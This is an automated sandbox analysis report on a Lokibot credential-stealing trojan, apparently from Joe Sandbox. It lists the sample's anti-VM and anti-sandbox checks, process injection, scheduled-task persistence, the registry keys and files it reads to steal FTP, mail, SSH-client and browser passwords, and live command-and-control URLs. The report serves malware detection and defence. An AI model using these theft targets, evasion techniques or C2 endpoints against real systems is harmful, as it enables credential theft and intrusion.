                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

                Malware Analysis System Evasion:

                barindex
                Yara detected AntiVM3Show sources
                Source: Yara matchFile source: 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 2CW1YLhNIS.exe PID: 5768, type: MEMORY
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe TID: 6000Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe TID: 5940Thread sleep time: -43657s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe TID: 4460Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe TID: 1644Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 4_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,4_2_00403D74
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeThread delayed: delay time: 43657Jump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeThread delayed: delay time: 60000Jump to behavior
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpBinary or memory string: vmware
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpBinary or memory string: VMWARE
                Source: 2CW1YLhNIS.exe, 00000000.00000002.648822995.000000000113F000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllI
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 4_2_0040317B mov eax, dword ptr fs:[00000030h]4_2_0040317B
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 4_2_00402B7C GetProcessHeap,RtlAllocateHeap,4_2_00402B7C
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion:

                barindex
                Injects a PE file into a foreign processesShow sources
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeMemory written: C:\Users\user\Desktop\2CW1YLhNIS.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\UieOsrSocP' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D57.tmp'Jump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess created: C:\Users\user\Desktop\2CW1YLhNIS.exe C:\Users\user\Desktop\2CW1YLhNIS.exeJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeQueries volume information: C:\Users\user\Desktop\2CW1YLhNIS.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 4_2_00406069 GetUserNameW,4_2_00406069
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information:

                barindex
                Yara detected LokibotShow sources
                Source: Yara matchFile source: 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.650407522.0000000003D19000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 2CW1YLhNIS.exe PID: 6172, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 2CW1YLhNIS.exe PID: 5768, type: MEMORY
                Source: Yara matchFile source: 0.2.2CW1YLhNIS.exe.3de0b28.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.2CW1YLhNIS.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.2CW1YLhNIS.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                Tries to harvest and steal browser information (history, passwords, etc)Show sources
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Tries to harvest and steal ftp login credentialsShow sources
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                Tries to steal Mail credentials (via file access)Show sources
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                Tries to steal Mail credentials (via file registry)Show sources
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: PopPassword4_2_0040D069
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: SmtpPassword4_2_0040D069
                Source: Yara matchFile source: 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.650407522.0000000003D19000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 2CW1YLhNIS.exe PID: 6172, type: MEMORY
                Source: Yara matchFile source: 0.2.2CW1YLhNIS.exe.3de0b28.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.2CW1YLhNIS.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.2CW1YLhNIS.exe.400000.0.raw.unpack, type: UNPACKEDPE

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsScheduled Task/Job1Scheduled Task/Job1Access Token Manipulation1Disable or Modify Tools1OS Credential Dumping2Account Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection111Deobfuscate/Decode Files or Information1Input Capture1File and Directory Discovery2Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Scheduled Task/Job1Obfuscated Files or Information4Credentials in Registry2System Information Discovery13SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing11NTDSSecurity Software Discovery231Distributed Component Object ModelInput Capture1Scheduled TransferApplication Layer Protocol112SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsProcess Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion41Cached Domain CredentialsVirtualization/Sandbox Evasion41VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsAccess Token Manipulation1DCSyncSystem Owner/User Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection111Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                2CW1YLhNIS.exe26%ReversingLabsWin32.Trojan.Pwsx
                2CW1YLhNIS.exe100%AviraHEUR/AGEN.1142734

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\UieOsrSocP.exe100%AviraHEUR/AGEN.1142734
                C:\Users\user\AppData\Roaming\UieOsrSocP.exe26%ReversingLabsWin32.Trojan.Pwsx

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                0.2.2CW1YLhNIS.exe.3de0b28.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                4.2.2CW1YLhNIS.exe.c90000.1.unpack100%AviraHEUR/AGEN.1142734Download File
                4.2.2CW1YLhNIS.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                0.2.2CW1YLhNIS.exe.8f0000.0.unpack100%AviraHEUR/AGEN.1142734Download File
                0.0.2CW1YLhNIS.exe.8f0000.0.unpack100%AviraHEUR/AGEN.1142734Download File
                4.0.2CW1YLhNIS.exe.c90000.0.unpack100%AviraHEUR/AGEN.1142734Download File

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
                http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
                http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
                http://63.141.228.141/32.php/QQojJUjm8ByeT0%Avira URL Cloudsafe
                http://alphastand.win/alien/fre.php0%URL Reputationsafe
                http://alphastand.win/alien/fre.php0%URL Reputationsafe
                http://alphastand.win/alien/fre.php0%URL Reputationsafe
                http://alphastand.trade/alien/fre.php0%URL Reputationsafe
                http://alphastand.trade/alien/fre.php0%URL Reputationsafe
                http://alphastand.trade/alien/fre.php0%URL Reputationsafe
                http://alphastand.top/alien/fre.php0%URL Reputationsafe
                http://alphastand.top/alien/fre.php0%URL Reputationsafe
                http://alphastand.top/alien/fre.php0%URL Reputationsafe
                http://www.ibsensoftware.com/0%URL Reputationsafe
                http://www.ibsensoftware.com/0%URL Reputationsafe
                http://www.ibsensoftware.com/0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://kbfvzoboss.bid/alien/fre.phptrue
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://63.141.228.141/32.php/QQojJUjm8ByeTtrue
                • Avira URL Cloud: safe
                		unknown
                http://alphastand.win/alien/fre.phptrue
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://alphastand.trade/alien/fre.phptrue
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://alphastand.top/alien/fre.phptrue
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name2CW1YLhNIS.exe, 00000000.00000002.649270975.0000000002D11000.00000004.00000001.sdmpfalse
                  		high
                  http://www.ibsensoftware.com/2CW1YLhNIS.exe, 2CW1YLhNIS.exe, 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpfalse
                    		high

                    Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public

                    IPDomainCountryFlagASNASN NameMalicious
                    63.141.228.141
                    		unknownUnited States
                    		33387NOCIXUStrue

                    General Information

                    Joe Sandbox Version:32.0.0 Black Diamond
                    Analysis ID:438541
                    Start date:22.06.2021
                    Start time:18:22:18
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 6m 12s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Sample file name:2CW1YLhNIS (renamed file extension from none to exe)
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:5
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@6/6@0/1
                    EGA Information:Failed
                    HDC Information:
                    • Successful, ratio: 72.8% (good quality ratio 69.9%)
                    • Quality average: 76.9%
                    • Quality standard deviation: 28.6%
                    HCA Information:
                    • Successful, ratio: 99%
                    • Number of executed functions: 89
                    • Number of non-executed functions: 29
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Stop behavior analysis, all processes terminated
                    Warnings:
                    Show All
                    • Exclude process from analysis (whitelisted): svchost.exe
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: /opt/package/joesandbox/database/analysis/438541/sample/2CW1YLhNIS.exe

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    18:23:04API Interceptor2x Sleep call for process: 2CW1YLhNIS.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    63.141.228.141scanbuild-pdf.exeGet hashmaliciousBrowse
                    • 63.141.228.141/32.php/hVjgJl5jKemRQ
                    proformapdf.exeGet hashmaliciousBrowse
                    • 63.141.228.141/32.php/hVjgJl5jKemRQ
                    PEMBAYARAN COPY TT_PDF.exeGet hashmaliciousBrowse
                    • 63.141.228.141/32.php/fn1ToJTMzu3Td
                    YNNRmYhVl9.exeGet hashmaliciousBrowse
                    • 63.141.228.141/32.php/S4wFP8QBww9Tp
                    nueva cotizaci#U00f3n.PDF.bat.exeGet hashmaliciousBrowse
                    • 63.141.228.141/32.php/a1NQk98eWCWX2
                    Confirmation Note.exeGet hashmaliciousBrowse
                    • 63.141.228.141/32.php/5mGrB9x77E21g
                    Iywwij0cboJSMRU.exeGet hashmaliciousBrowse
                    • 63.141.228.141/32.php/nGBv5iZqdfzrl
                    SecuriteInfo.com.Trojan.Win32.Save.a.1333.exeGet hashmaliciousBrowse
                    • 63.141.228.141/32.php/3LJAZguIGMmJV
                    o8jhgzsjD1jQsHo.exeGet hashmaliciousBrowse
                    • 63.141.228.141/32.php/nGBv5iZqdfzrl
                    Purchase Order-020POR040557 (2).exeGet hashmaliciousBrowse
                    • 63.141.228.141/32.php/DoGLQLrii1o27
                    HSBCpayment_advice.pdf.exeGet hashmaliciousBrowse
                    • 63.141.228.141/32.php/5l0ZnNa7AB6Dl
                    SCAN files.exeGet hashmaliciousBrowse
                    • 63.141.228.141/32.php/3LJAZguIGMmJV
                    pdf.zip.exeGet hashmaliciousBrowse
                    • 63.141.228.141/32.php/YjfkU88ZV6lc0
                    fW8OKRxAMYlXtGW.exeGet hashmaliciousBrowse
                    • 63.141.228.141/32.php/nGBv5iZqdfzrl
                    pdf.zip.exeGet hashmaliciousBrowse
                    • 63.141.228.141/32.php/YjfkU88ZV6lc0
                    RFQ For June 2021.exeGet hashmaliciousBrowse
                    • 63.141.228.141/32.php/fhAq3ugeI7NI8
                    MqaRnuUlL4etOtz.exeGet hashmaliciousBrowse
                    • 63.141.228.141/32.php/nGBv5iZqdfzrl
                    Purchase Order-020POR040557 (2).exeGet hashmaliciousBrowse
                    • 63.141.228.141/32.php/vkuep8Jt3rHQ5
                    BtLe7XbewiWhuoD.exeGet hashmaliciousBrowse
                    • 63.141.228.141/32.php/8400chmGujESe
                    V8tgawp0z3hIiWB.exeGet hashmaliciousBrowse
                    • 63.141.228.141/32.php/qB0GQ2GKLyuOU

                    Domains

                    No context

                    ASN

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    NOCIXUSscanbuild-pdf.exeGet hashmaliciousBrowse
                    • 63.141.228.141
                    proformapdf.exeGet hashmaliciousBrowse
                    • 63.141.228.141
                    PEMBAYARAN COPY TT_PDF.exeGet hashmaliciousBrowse
                    • 63.141.228.141
                    YNNRmYhVl9.exeGet hashmaliciousBrowse
                    • 63.141.228.141
                    nueva cotizaci#U00f3n.PDF.bat.exeGet hashmaliciousBrowse
                    • 63.141.228.141
                    Confirmation Note.exeGet hashmaliciousBrowse
                    • 63.141.228.141
                    Iywwij0cboJSMRU.exeGet hashmaliciousBrowse
                    • 63.141.228.141
                    SecuriteInfo.com.Trojan.Win32.Save.a.1333.exeGet hashmaliciousBrowse
                    • 63.141.228.141
                    o8jhgzsjD1jQsHo.exeGet hashmaliciousBrowse
                    • 63.141.228.141
                    Purchase Order-020POR040557 (2).exeGet hashmaliciousBrowse
                    • 63.141.228.141
                    HSBCpayment_advice.pdf.exeGet hashmaliciousBrowse
                    • 63.141.228.141
                    SCAN files.exeGet hashmaliciousBrowse
                    • 63.141.228.141
                    pdf.zip.exeGet hashmaliciousBrowse
                    • 63.141.228.141
                    fW8OKRxAMYlXtGW.exeGet hashmaliciousBrowse
                    • 63.141.228.141
                    pdf.zip.exeGet hashmaliciousBrowse
                    • 63.141.228.141
                    RFQ For June 2021.exeGet hashmaliciousBrowse
                    • 63.141.228.141
                    MqaRnuUlL4etOtz.exeGet hashmaliciousBrowse
                    • 63.141.228.141
                    Purchase Order-020POR040557 (2).exeGet hashmaliciousBrowse
                    • 63.141.228.141
                    BtLe7XbewiWhuoD.exeGet hashmaliciousBrowse
                    • 63.141.228.141
                    V8tgawp0z3hIiWB.exeGet hashmaliciousBrowse
                    • 63.141.228.141

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\2CW1YLhNIS.exe.log
                    Process:C:\Users\user\Desktop\2CW1YLhNIS.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:modified
                    Size (bytes):1314
                    Entropy (8bit):5.350128552078965
                    Encrypted:false
                    SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                    MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                    SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                    SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                    SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                    C:\Users\user\AppData\Local\Temp\tmp9D57.tmp
                    Process:C:\Users\user\Desktop\2CW1YLhNIS.exe
                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):1643
                    Entropy (8bit):5.171209003004209
                    Encrypted:false
                    SSDEEP:24:2dH4+SEqC/S7hblNMFp//rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBGWtn:cbhK79lNQR/rydbz9I3YODOLNdq3/
                    MD5:C923D89D6474FE393E213E4D1A3090E4
                    SHA1:AA1DC430A3DA6B691E97DC55B2F8E5BBC68B2826
                    SHA-256:483F5360FA7519AF97EBB641E91ED9014A62693F1014540C85A0A5FDA6E3EC3F
                    SHA-512:C1EA31DD5860BF44427022764E448F3EA7F09548BE2BF9124B59F4CD79A827C64FE3D7094E5E768D39482AC576E1D92AC5CF0C4C29D54D62C8F457D1E00E1676
                    Malicious:true
                    Reputation:low
                    Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                    C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                    Process:C:\Users\user\Desktop\2CW1YLhNIS.exe
                    File Type:very short file (no magic)
                    Category:dropped
                    Size (bytes):1
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3:U:U
                    MD5:C4CA4238A0B923820DCC509A6F75849B
                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview: 1
                    C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\bc49718863ee53e026d805ec372039e9_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                    Process:C:\Users\user\Desktop\2CW1YLhNIS.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):598
                    Entropy (8bit):0.6390116820665388
                    Encrypted:false
                    SSDEEP:3:/lbel/lllbel/lllbel/lllbel/lllbel/lllbel/lllbq:4/g/g/g/g/g/g
                    MD5:80F54DC1616678F37E478AC064CEC423
                    SHA1:B8DB85EC31702B48B95A727092A38B446360FCA7
